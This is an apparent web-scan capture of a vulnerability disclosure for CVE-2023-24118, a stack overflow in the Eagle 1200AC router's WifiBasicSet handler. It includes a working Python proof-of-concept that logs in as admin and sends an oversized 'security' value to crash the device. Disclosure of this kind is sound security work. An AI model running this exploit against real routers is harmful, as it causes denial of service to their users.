oxnan.com
Open in
urlscan Pro
2a06:98c1:3120::c
Public Scan
URL:
https://oxnan.com/posts/WifiBasic_security_DoS
Submission: On March 08 via api from US — Scanned from NL
Submission: On March 08 via api from US — Scanned from NL
Form analysis 0 forms found in the DOM
Text Content
* Home
* About
[CVE-2023-24118] DOS VIA SECURITY PARAMETER IN EAGLE 1200AC
DESCRIPTION
Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a
stack overflow via the security parameter at /goform/WifiBasicSet.
ADDITIONAL INFORMATION
In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the
user-controlled string security is stored into wl2g.extra.security via SetValue.
When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded
from wl2g.extra.security and then stored into stack buffer wifi_buf_entry.
Because the length of security is not checked, the stack buffer can be
overflowed if it is a large string.
POC SCRIPT:
import requests
IP="192.168.38.1"
logindata = {
"username":"admin",
"password":"81dc9bdb52d04dc20036dbd8313ed055"
}
def login():
for i in range(10):
session = requests.Session()
res = session.post(f"http://{IP}/login/Auth", data=logindata)
try:
passwd = session.cookies["password"]
return passwd
except:
pass
session = requests.Session()
session.cookies.set("password",login())
payload = {"security" : "A"*(0x800)}
res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
print(res.status_code)
res = session.post(f"http://{IP}/goform/WifiBasicGet")
print(res.text)
print(res)